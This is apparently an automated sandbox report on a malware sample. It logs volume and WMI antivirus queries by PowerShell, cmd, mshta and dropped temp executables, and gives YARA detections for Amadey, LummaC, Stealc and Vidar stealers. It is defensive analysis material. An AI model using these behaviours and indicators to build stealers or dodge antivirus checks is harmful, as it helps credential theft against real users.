                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeQueries volume information: unknown VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_6C53A8DC
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C488390 NSS_GetVersion,3_2_6C488390
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: 64252d274d.exe, 00000024.00000003.2465555446.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000002.2568911959.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2462258153.0000000001533000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2510983657.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2511360727.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2466909262.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2536453720.00000000014AC000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4862231655.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886583987.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4898372977.0000000000A0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected Amadey
                                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                    Yara detected Amadeys stealer DLL
                                    Source: Yara matchFile source: 7.2.skotes.exe.f50000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 72.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 75.2.483d2fa8a0d53818306efeb32d3.exe.c00000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.2.456YTTQ213T2RO9QAEYSNNZDL.exe.e70000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 28.2.HJEHIJEBKE.exe.6c0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 6.2.skotes.exe.f50000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000004B.00000002.2646109112.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000007.00000002.1917695325.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000048.00000002.2597235360.0000000000C01000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000006.00000002.1915110312.0000000000F51000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.1849269108.0000000000E71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                                    Yara detected LummaC Stealer
                                    Source: Yara matchFile source: Process Memory Space: 64252d274d.exe PID: 7584, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 696689ce6d.exe PID: 1072, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: EdYEXasNiR.exe PID: 6464, type: MEMORYSTR
                                    Yara detected Stealc
                                    Source: Yara matchFile source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000003.00000002.2212351037.0000000000EF1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000003.00000002.2211683173.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: DX0TGIT2LZWIIEDZ8Y3A15R.exe PID: 2656, type: MEMORYSTR
                                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                    Yara detected Vidar stealer
